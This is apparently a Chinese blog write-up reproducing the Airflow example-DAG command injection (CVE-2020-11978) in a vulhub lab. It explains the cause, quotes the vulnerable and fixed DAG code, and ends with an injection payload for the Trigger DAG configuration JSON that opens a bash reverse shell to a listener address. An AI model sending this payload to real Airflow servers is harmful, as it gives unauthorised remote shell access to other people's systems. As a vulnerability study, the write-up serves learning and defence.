• 漏洞复现----48、Airflow dag中的命令注入(CVE-2020-11978)



    一、Apache Airflow简介

    Apache Airflow是 python 语言编写的一个以编程方式创作、安排和监控工作流程的平台。Airflow通过DAG(Directed acyclic graph 有向无环图)来管理任务流程的任务调度工具。Airflow除了一个命令行界面,还提供了一个基于 Web 的用户界面可以可视化管道的依赖关系、监控进度、触发任务等。

    二、漏洞成因

    Apache Airflow<=1.10.10 在 Airflow 附带的一个示例DAG= example_trigger_target_dag允许任何经过身份验证的用户以运行Airflow工作程序/调度程序的用户身份运行任意命令。
    默认情况下Airflow Web UI是未授权访问的,Airflow Web UI中提供了触发DAG运行的功能,以便测试DAG,而其中example_trigger_controller_dagexample_trigger_target_dag两个DAG组合起来触发命令注入,导致了漏洞产生。
    如果在配置中设置 load_examples=False 禁用了示例,就不会受到攻击。

    example_trigger_controller_dag和example_trigger_target_dag分析

    1、example_trigger_controller_dag

    #airflow/example_dags/example_trigger_controller_dag.py
    from airflow import DAG
    from airflow.operators.dagrun_operator import TriggerDagRunOperator
    from airflow.utils.dates import days_ago
    
    dag = DAG(
        dag_id="example_trigger_controller_dag",
        default_args={"owner": "airflow", "start_date": days_ago(2)},
        schedule_interval="@once",
        tags=['example']
    )
    
    trigger = TriggerDagRunOperator(
        task_id="test_trigger_dagrun",
        trigger_dag_id="example_trigger_target_dag",  # Ensure this equals the dag_id of the DAG to trigger
        conf={"message": "Hello World"},
        dag=dag,
    )
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18

    2、example_trigger_target_dag

    #airflow/example_dags/example_trigger_target_dag.py
    from airflow import DAG
    from airflow.operators.bash import BashOperator
    from airflow.operators.python import PythonOperator
    from airflow.utils.dates import days_ago
    
    dag = DAG(
        dag_id="example_trigger_target_dag",
        default_args={"start_date": days_ago(2), "owner": "airflow"},
        schedule_interval=None,
        tags=['example']
    )
    
    
    def run_this_func(**context):
        """
        Print the payload "message" passed to the DagRun conf attribute.
    
        :param context: The execution context
        :type context: dict
        """
        print("Remotely received value of {} for key=message".format(context["dag_run"].conf["message"]))
    
    
    run_this = PythonOperator(task_id="run_this", python_callable=run_this_func, dag=dag)
    
    bash_task = BashOperator(
        task_id="bash_task",
        bash_command='echo "Here is the message: \'{{ dag_run.conf["message"] if dag_run else "" }}\'"',
        dag=dag,
    )
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    """
    Example usage of the TriggerDagRunOperator. This example holds 2 DAGs:
    1. 1st DAG (example_trigger_controller_dag) holds a TriggerDagRunOperator, which will trigger the 2nd DAG
    2. 2nd DAG (example_trigger_target_dag) which will be triggered by the TriggerDagRunOperator in the 1st DAG
    """
    import pendulum
    
    from airflow import DAG
    from airflow.decorators import task
    from airflow.operators.bash import BashOperator
    
    
    @task(task_id="run_this")
    def run_this_func(dag_run=None):
        """
        Print the payload "message" passed to the DagRun conf attribute.
        :param dag_run: The DagRun object
        """
        print(f"Remotely received value of {dag_run.conf.get('message')} for key=message")
    
    
    with DAG(
        dag_id="example_trigger_target_dag",
        start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
        catchup=False,
        schedule_interval=None,
        tags=['example'],
    ) as dag:
        run_this = run_this_func()
    
        bash_task = BashOperator(
            task_id="bash_task",
            bash_command='echo "Here is the message: $message"',
            env={'message': '{{ dag_run.conf.get("message") }}'},
        )
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35

    通过example_trigger_controller_dag内部定义的conf={"message": "Hello World"}来触发example_trigger_target_dag中的bash_command='echo "Here is the message"'。如果此处dag_run.conf.get("message")可控,则可以注入恶意命令。
    在Airflow中,conf用于定义传递参数的方式, 而且Airflow提供了多种方法可以修改conf
    1、命令行模式

    airflow dags trigger --conf '{"conf1": "value1"}' example_parametrized_dag
    
    • 1

    2、Web UI 上直接触发任意DAG并传递dag_run.conf
    在这里插入图片描述

    三、漏洞复现

    下文漏洞复现通过Web UI触发DAG传递dag_run.conf("message")执行任意命令:

    使用vulhub靶场CVE-2020-11978

    #启动airflow
    docker-compose run airflow-init
    docker-compose up -d
    
    • 1
    • 2
    • 3

    访问IP:8080进入airflow管理端
    开启example_trigger_target_dag

    在这里插入图片描述

    点击example_trigger_target_dag,进入页面,点击Trigger DAG,进入到调试页面。
    在这里插入图片描述
    Configuration JSON中输入需要执行的命令:
    在这里插入图片描述

    {"message":"'\";bash -i >& /dev/tcp/10.211.55.3/6666 0>&1;#"}
    
    • 1

    监听端执行监听
    在这里插入图片描述


    参考链接:
    https://github.com/apache/airflow/blob/main/airflow/example_dags/example_trigger_target_dag.py
    https://vulhub.org/#/environments/airflow/CVE-2020-11978/

  • 相关阅读:
    Linux系统中常用的压缩与解压缩方法
    Redis系列:Redis的概述与安装
    .Net 7 C#11 原始字符串
    若依分页问题
    FANUC机器人电气控制柜内部硬件电路和模块详细介绍
    科技部原副部长吴忠泽:尽早抢占元宇宙高地,掌握下一代互联网的话语权和主动权
    803_Div3(3SUM Closure)
    原生CLI指令构建npm run减少硬盘node_modules的开销
    凛冬已至,望各位早日背上行囊出发
    【Vue】VueCLI 的使用和单文件组件(1)
  • 原文地址:https://blog.csdn.net/sycamorelg/article/details/125601941